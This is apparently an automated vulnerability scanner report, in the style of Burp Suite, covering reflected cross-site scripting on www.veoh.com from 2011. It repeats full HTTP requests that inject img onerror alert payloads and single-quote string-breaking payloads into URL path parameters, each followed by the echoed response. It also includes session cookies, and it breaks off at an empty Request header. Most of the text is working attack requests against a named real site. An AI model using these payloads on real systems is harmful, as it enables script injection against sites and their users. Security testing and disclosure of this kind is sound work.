GET /browse/videos/category/action_adventure8887d"><img%20src%3da%20onerror%3dalert(1)>d7d3c7b55c9/watch/v20753891TQ237Z7N HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:37:26 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=4 Content-Length: 76350
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventure8887d"><img src=a onerror=alert(1)>d7d3c7b55c9/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 217c0'%3b0ff76e45310 was submitted in the REST URL parameter 6. This input was echoed as 217c0';0ff76e45310 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v20753891TQ237Z7N217c0'%3b0ff76e45310 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:46 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=90 Content-Length: 94049
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d72a7"><img%20src%3da%20onerror%3dalert(1)>bce4688ba7f was submitted in the REST URL parameter 4. This input was echoed as d72a7"><img src=a onerror=alert(1)>bce4688ba7f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventured72a7"><img%20src%3da%20onerror%3dalert(1)>bce4688ba7f/watch/v2075425966g5b8E8 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:36:42 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=78 Content-Length: 76749
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventured72a7"><img src=a onerror=alert(1)>bce4688ba7f/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e341d<img%20src%3da%20onerror%3dalert(1)>553e22281c1 was submitted in the REST URL parameter 4. This input was echoed as e341d<img src=a onerror=alert(1)>553e22281c1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventuree341d<img%20src%3da%20onerror%3dalert(1)>553e22281c1/watch/v2075425966g5b8E8 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:37:36 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=93 Content-Length: 76705
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventuree341d<img src=a onerror=alert(1)>553e22281c1"}</textarea> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 134b4'%3b0705df69313 was submitted in the REST URL parameter 6. This input was echoed as 134b4';0705df69313 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v2075425966g5b8E8134b4'%3b0705df69313 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:14 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=51 Content-Length: 94049
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cf07"><img%20src%3da%20onerror%3dalert(1)>5bb73bd76de was submitted in the REST URL parameter 4. This input was echoed as 6cf07"><img src=a onerror=alert(1)>5bb73bd76de in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure6cf07"><img%20src%3da%20onerror%3dalert(1)>5bb73bd76de/watch/v20754927ZpAfSEzt HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:12 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=62 Content-Length: 76243
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventure6cf07"><img src=a onerror=alert(1)>5bb73bd76de/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9241d<img%20src%3da%20onerror%3dalert(1)>74c4f0281bf was submitted in the REST URL parameter 4. This input was echoed as 9241d<img src=a onerror=alert(1)>74c4f0281bf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure9241d<img%20src%3da%20onerror%3dalert(1)>74c4f0281bf/watch/v20754927ZpAfSEzt HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:48 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=63 Content-Length: 76199
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure9241d<img src=a onerror=alert(1)>74c4f0281bf"}</textarea> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f615e'%3b41e7360e1ba was submitted in the REST URL parameter 6. This input was echoed as f615e';41e7360e1ba in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v20754927ZpAfSEztf615e'%3b41e7360e1ba HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:59 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=64 Content-Length: 94049
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c9a6b<img%20src%3da%20onerror%3dalert(1)>0a8a5dfab55 was submitted in the REST URL parameter 4. This input was echoed as c9a6b<img src=a onerror=alert(1)>0a8a5dfab55 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventurec9a6b<img%20src%3da%20onerror%3dalert(1)>0a8a5dfab55/watch/v20756872Ta2Y7sDB HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:37 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=19 Content-Length: 76652
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventurec9a6b<img src=a onerror=alert(1)>0a8a5dfab55"}</textarea> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29b15"><img%20src%3da%20onerror%3dalert(1)>23623364388 was submitted in the REST URL parameter 4. This input was echoed as 29b15"><img src=a onerror=alert(1)>23623364388 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure29b15"><img%20src%3da%20onerror%3dalert(1)>23623364388/watch/v20756872Ta2Y7sDB HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:37:30 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=73 Content-Length: 76696
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventure29b15"><img src=a onerror=alert(1)>23623364388/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80777'%3b1ead9050767 was submitted in the REST URL parameter 6. This input was echoed as 80777';1ead9050767 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v20756872Ta2Y7sDB80777'%3b1ead9050767 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:48 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=90 Content-Length: 94049
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55707"><img%20src%3da%20onerror%3dalert(1)>2b623c86a4a was submitted in the REST URL parameter 4. This input was echoed as 55707"><img src=a onerror=alert(1)>2b623c86a4a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure55707"><img%20src%3da%20onerror%3dalert(1)>2b623c86a4a/watch/v20757961gnh48zmS HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:37:23 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=100 Content-Length: 76349
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventure55707"><img src=a onerror=alert(1)>2b623c86a4a/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a9c05<img%20src%3da%20onerror%3dalert(1)>ebb993b4b67 was submitted in the REST URL parameter 4. This input was echoed as a9c05<img src=a onerror=alert(1)>ebb993b4b67 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventurea9c05<img%20src%3da%20onerror%3dalert(1)>ebb993b4b67/watch/v20757961gnh48zmS HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:37 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=78 Content-Length: 76305
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventurea9c05<img src=a onerror=alert(1)>ebb993b4b67"}</textarea> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1adb'%3b90455422d30 was submitted in the REST URL parameter 6. This input was echoed as a1adb';90455422d30 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
